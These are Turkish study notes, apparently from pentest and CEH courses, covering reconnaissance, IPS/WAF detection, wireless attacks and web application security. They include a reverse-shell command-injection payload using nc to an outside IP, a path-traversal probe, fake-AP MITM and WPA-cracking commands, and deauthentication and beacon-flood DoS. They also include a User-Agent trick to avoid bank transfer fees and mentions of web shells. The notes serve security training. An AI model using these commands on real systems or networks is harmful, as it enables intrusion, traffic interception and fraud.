Pentest in Practice - III: Aktif Bilgi Toplama

Aktif Bilgi Toplama

• İz bırakan bilgi toplama yöntemleri.
• Ağ haritası çıkarma: Router, Firewall, IPS, WAF...
• Açık sistemler, açık portlar vs bilgileri toplama.
• TraceRoute / Tracert
• Windows'ta ICMP, linux'te UDP port 30000 üzerinden çalışır
• tcptraceroute. TCP 80 portundan çalışır.
• Linux'te komut olarak var.
• serversniff.net'te "IP tools" menüsü altında var.
• dig MX ... ==> Mail exchange sorgulaması
• NMAP
• -Pn ==> "Ping atma" diyoruz nmap'e.
• IPS Keşfi Çalışması
• IPS'lerin çok büyük çoğunluğu Layer2 çalışır; dolayısıyla TTL değeri incelemesiyle filan IPS keşfi yapılamaz.
• Test: IPS'in yakalayacağından emin olduğun bir talep gönder, ../../ ya da etc/passwd gibi. Sonra dönen yanıtı incele.
• Örnek: 
• telnet www.site.com 80
• GET ../../../cmd.exe HTTP/1.0
• Web sunucudan yanıt (200'lü, 400'lü vs) dönmüyor da "Connection closed by foreign host" gibi bir yanıt dönüyorsa...
• IPS çalışma mantığı
• DRP
• RST
• IPS evasion technique:
• IPS, SYN talebi içinde geçen kurcalanmış payload'ları loglamaya çalışıyorsa (stateful çalışmıyor demektir) IPS şişirilerek kontrol edilemez hale getirilir. Bu durumda IPS çoğunlukla gelen trafiği incelemeden geçirmeye başlar; diğer bir yol, tüm trafiği engellemesidir ki genelde tercih edilmez.
• Syn-Cookie. Açık olan/olmayan her port için (ilgili makineye hiç gitmeden) açık cevabı gönderir. Bu, SYN scan işe yaramaz demektir.
• WAF Keşfi. WafW00f
• Sistem uptime'ının belirlenmesi: hping3 -s --tcp-timestamp...

Pentest in Practice - II: Pasif Bilgi Toplama

Pasif Bilgi Toplama

• The Harvester: Bactrack5'te /pentest/enumeration/theharvester
• $ python theharvester.py -d www.site.com.tr -b google -l 100
• Netcraft
• Eski olabilir; nmap ile alınan sonuçları teyit amacıyla kullanılabilir.
• Aynı IP üzerindeki domain'leri sorgulamak için: 
• bing.com ==> ip:www.site.com.tr
• robtex.com
• pipl.com: Kişi hakkında web üzerinde araştırma yapar.
• GHDB: Google Hacking DataBase
• www.hackersforcharity.org/ghdb
• johnny.ihackstaff.com
• exploit-db.com ==> GooLag Scanner
• Online pasif bilgi toplama:
• clez.net
• serversniff.net
• hackertarget.com

Pentest in Practice - I: Genel

• DRADIS Pentest Framework: Pentest ekiplerinin çalışma süresince bulgularını paylaşabilecekleri ortam.
• İç pentestlerde öncelik, ağ altyapısının güvenliğidir. Güvenlik için kurulacak araçlar ancak altyapı kadar güvenli olabilir.
• ISSAF: Adım adım testleri ve açıklıkların nasıl exploit edileceğini anlatır bir proje. Son zamanlarda güncellenmemiş olmaklakla birlikte pentest işine yeni başlayanlar için oldukça değerli bir kaynak (En son Mayıs 2006'da güncellenmiş görünüyor).
• Penetration Testing Framework
• http://www.vulnerabilityassessment.co.uk
• "Şu konuyla alakalı hangi araçları kullanabilirim?"
• Test yaparken sürekli açık olmasında fayda var. Açık bir port buldun ve üzerinde çalışan uygulamayı belirledin, "şimdi neler yapabilirim" sorusunun cevabı bu sitede.
• FireCAT: Firefox Catalog of Auditing ExTensions. Testlerde ve denetlemelerde yararlanılabilecek Firefox plug-in'leri.

CEH by BGA - Gün 5 - Ders 2

Wireless Ağ Güvenliği (Devam)

• Wireless MAC adres filtreleme atlatma:
• Monitor modda sistemi dinleriz, bağlanan istemci MAC adreslerinigörürürüz, o MAC adreslerden birini alır, çıkmasını bekleriz, kendi MAC adresimizi değiştirerek bu aşamayı atlatırız.
• Adam çıkmıyorsa deauthentication paketleriyle adamın düşmesini sağlayabiliriz.
• #macchanger -m 00:11:22:33:44:55 => Fake MAC adres kullanmak için.
• WPA. İlk pakette geçen PSK (PreShared Key), TKIP mekanizması tarafından kullanılarak sonraki trafik için yeni anahtarlar üretilir. PSK aynı zamanda SSID ile tuzlanıyor.
• Handshake ilk 4 pakette oluyor.
• (Parantez) #genpmk => Rainbow list oluşturma aracı.
• www.wpacracker.com => Bir sürü makineyi paralel çalıştırarak bruteforce wpa şifresini 10'lu dakikalarda kırabileceğini iddia eden site. ESSID'yi istiyor, tuz olarak kullanacak. Sonra rainbow table'lar ve bruteforce...
• Gerix wifi cracker. Backtrack içinde mevcut.
• Sahte AP oluşturma. Gerix içinden mümkün. En kolayı mitmap. Backtrack içinde => /pentest/wireless/mitmap/mitmap.sh
• bash mitmap.sh -m ap -i wlan0 -o eth0 -s profectAkademi -d /etc/dhcp3/dhcpd.conf => sanal bir AP oluşturup (ssid'si ap), bağlananların trafiğini üzerimden geçirip makinem üzerinden (eth0) internete çıkaracağım.
• (Parantez) #iwconfig
• WPA2
• 802.11i
• Authentication için yine PSK kullanıyor.
• Şifrelemede TKIP yerine daha güçlüolan AES-CCMP kullanılıyor.
• İstemcinin donanımsal olarak desteklemesi gerekiyor.
• Adım adım WPA PSK Kırma => Sunumlarda var. Oradan alıp buraya eklemek faydalı olur.
• Cihazımı injection'ı destekliyor mu testi:
• Önce monitor moda alıyoruz (#airmon-ng start wlan0).
• #aireplay-ng -9 mon0 sorgusu sonucunda "Injection is working" yanıtı alıyorsak destekliyor demektir.
• "top 1000 ssid rainbow table" diye google'da arat. Bilinmeyen bir SSID için rainbow table oluşturamaz.
• WPA PSK kırma: ATI ve NVIDIA grafik kartlarının CPU'su kullanılarak kırma işlemi (denemeler) binlerce kat arttırılabilir.
• DoS => Beacon Flood. mdk3 aracı kullanarak yapılır. Ortamda bir sürü sahte AP görünür.
• DoS => zulu.

CEH by BGA - Gün 5 - Ders 1

Kablosuz Ağlar ve Güvenlik

• Backtrack misali bir sanal makinede ana makinenin kablosuz ağ adaptörü, ethernet kart gibi görünür. Bir USB dongle'ı takıp VMWare (ya da VirtualBox) üzerinden takılan aygıtın wireless adapter olduğunu belirtmek gerekiyor.
• 802.11 ağlarda tüm iletişim frame'ler aracılığıyla gerçekleştirilir. Çeşitleri
• Management frame: bağlantı başlatma ve yönetim.
• Authentication
• Deauthentication
• Beacon frame. Access point tarafından yapılan broadcast duyurulardır. İstemcilerin aktif AP'leri bulmasını sağlar.
• ...
• Control frame
• Data frame
• Probe request. Ağa bağlanmak isteyen istemcilerin gönderdiği paket türü. Broadcast. AP bu requeste yanıt (probe replay) döner.
• IEEE 802.11 standardı.
• SSID. BSSID (AP MAC adresi); ESSID (AP Adı)
• WEP. Kabloyla eşdeğer güvenlik (Wired Equivalent Privacy). Hızlıca çıkarıldığı için yeterince güvenliolması sağlanmamış. 64 bit, 24 biti trafikte açık olarak gidiyor.
• WPA. WiFi Protected Access. WEP'in açıklarını kapatmak amacıyla çıkmış. WEP'ten en önemli farkı statik yerine dinamik anahtar kullanılıyor.
• WPA = WEP + TKIP (Temporal Key Integrity Protocol)
• Ad-hoc = IBSS (Independed Basic Service Set). AP'ye gerek duymadan wireless cihazların birbiri arasında haberleşmesi.
• Infrastructure mode = BSS
• Kablosuz ağ arabirim modları:
• Master mode. Kanal no + SSID ismi ile AP görevi yapabilir.
• #iwconfig wlan0 mode master (adhoc, monitor...) => master mode destekleniyorsa olur.
• Airbase-ng. İstediğimiz özelliklerde access point oluşturmak için kullanılan bir tool. Linux'te command-line.
• Managed mode. Client.
• Ad-hoc mode
• Monitor mode. 
• Pasif bir mode. 
• Ethernetteki promiscous mode'a benzer.
• Trafiği izler.
• Bağlanmadan monitor mode'a alırsanız kendinizibütün trafiği görürsünüz. 
• Trafik şifreli ise (WEP/WPA) sadece MAC adreslerini görürüz.
• WiFi noktalarında açık şekilde trafik izlenebilir.
• Wireless tarafında biri trafiği dinliyorsa ruhumuz duymaz.
• Bütün atraksiyonlar bu modda yapılır, hackerlar için kıymetli mod bu yani.
• Linux tarafında wireless adaptörler için driver'lar yazarak monitor mode destekler hale getiriliyor. Windows tarafında 7'ye kadar yokmuş zaten, yeni destekler olmuş.
• #airmon-ng mon0 start
• #iwlist wlan0 scan => ortamdaki wireless cihazların listesi.
• Keşif
• Aktif keşif. Sadece kendini ifşa edenleri tespit edebiliriz.
• Pasif keşif. Monitor modda.
• Kismet. İncele!!
• Aktif keşif aracı olarak Cain&Abel da kullanılabilir. Ama bu keşif bize pasif modda çalışan AP'leri vermez. Kismet veriyordu. Cain&Abel uyumlu bir wireless adapter (190$ civarı) ile birlikte WPA/WEP 

CEH by BGA - Gün 4 - Ders 4

Web Uygulamaları Güvenliği (Devamı)

• Uygulama, password resetlemede eski password'ünüzü gönderiyorsa password'ü açık metin tutuyor demektir (%99). Hash'li olsa eski password'ü dönemez.
• Parolaları hashlerken mutlaka salt (tuz) değerleri kullanılmalı. Ya da tekrar tekrar hashlenebilir.
• Default parolaları denetimlerde mutlaka dene.
• IPS'ler statik koruma sağladığından ve genellikle SSL trafiğe bakmadığından web uygulama saldırılarını önleme zayıftır.
• Firewall/IPS/WAF karşılaştırması => F5
• WAF örnekleri: Imperva, Modsecurity (open source, linux'te ilaçtır, Apache için), Breach Security, F5, Citrix Netscaler...
• Yapılandırılırsa iyi, yapılandırılmazsa kötüdür.
• Yorum: Citrix'in Türkiye temsilcileri, F5'ın temsilcilerinden teknik olarak daha bilgili (güvenlik tarafı için)
• Çalışma mantığı
• Positive Sec. Model
• Negative Sec. Model
• Learn-based
• Yerleşim senaryoları
• inline bridge (IPS modu)
• offline (passive) => WAF'ı tanıyana kadar bu modda çalıştırmak mantıklı.
• integrated (%3) => sadece bütünleştiği sunucuyu korur.
• reverse proxy (%95)
• WebGoat çözüm videoları internette var. Ara.
• Acunetix'in eğitim amaçlı uygulaması var.
• Nikto.
• Nessus üzerinden Nikto'yu plug-in olarak ekleyip kullanabiliyorsunuz.
• Uygulama: WafW00F. İncele!!
• (Parantez) novirusthanks.org => virustotal'e alternatif, underground camia tarafından kullanılan.
• (Parantez) 100% FUD (Fully UnDetectable)

CEH by BGA - Gün 4 - Ders 2-3

Web Uygulama Güvenliği (Devamı)

• shodanhq.com/exploits => şimdiye kadar çıkmış açıklıkların aratılabileceği, google'a alternatif, exploitlere özel arama motoru.
• LoginFinder. Windows tarafında çalışan bir uygulama. Uygulamalardaki sadece login ekranlarını bulmaya yarıyor.
• Paros artık geliştirilmeyen bir ürün.
• Owasp ZAP => Paros'un yeni versiyonu gibi değerlendirilebilir.
• Flash decompile edilebilir, içinde user/pwd barındırıyor olabilir. Flash testlerinde aklında olsun!
• x-forward-for. İncele!!! Bu özelliğin aktif olduğu proxylerde talep başka IP'den gelmiş gibi yorumlar bırakabilir saldırgan sunucuya. IP spoofing normal şartlarda yapılamaz ama bu durumda IP spoofing yapılıyor gibi istekler gönderilebilir işte!
• Gelen talebin mobil cihazdan mı, PC'den web üzerinden mi geldiğinianlamanın yolu User-Agent header'ıdır. Bu da client tarafından doldurulan bir alan olduğundan rahatlıkla değişitirlebilir.
• Bu konuya örnek Garanti'nin mobil cihazlar üzerinden yapılan EFT'lerden ücret almaması. User-Agent ile oynayıp talep mobil cihazdan gidiyormuş gibi göstererek EFT'ye ücret ödemez.
• Genel Düstur: Kullanıcıdan gelen bilgiye kesinlikle güvenilmez.
• Flash scanner: swfscan!!!
• XSS ile ilgili kitap: XSS Exploits.
• testfire.net => DVWA gibi bir site.
• TinKode security blog => Hackliyor ve sonuçlarını sitesinde yayınlıyor. 
• SQLi araçları: Pangolin, Havij. İncele!!!
• Command Injection Exploitation: ";nc -e /bin/bash 192.168.200.12 443" => shell açma.
• -e ile sonrasından gelen file'ı çalıştır diyoruz.
• File Inclusion
• Local (LFI)
• Remote (RFI)
• ha.ckers.org/weird/rfi-locations.dat => RFI zafiyeti içeren URL kalıpları
• Upload yapmaya izin veren sitelere dikkat (forumlarda avatar upload'u mesela)
• Web Shell. Hacklenen sunucuları daha kolay yönetmek için yazılmış web uygulamaları.
• R57 en popülerlerinden biriydi. İfşa olduğundan artık kullanılmıyor.
• c99.php dosyası DVWA'nın RFI testinde shell açmak için upload edilebilecek dosya. Dosyanın neler yaptığına DİKKAT! Test ettiğimiz makineyi kamuya mal etmeyelim...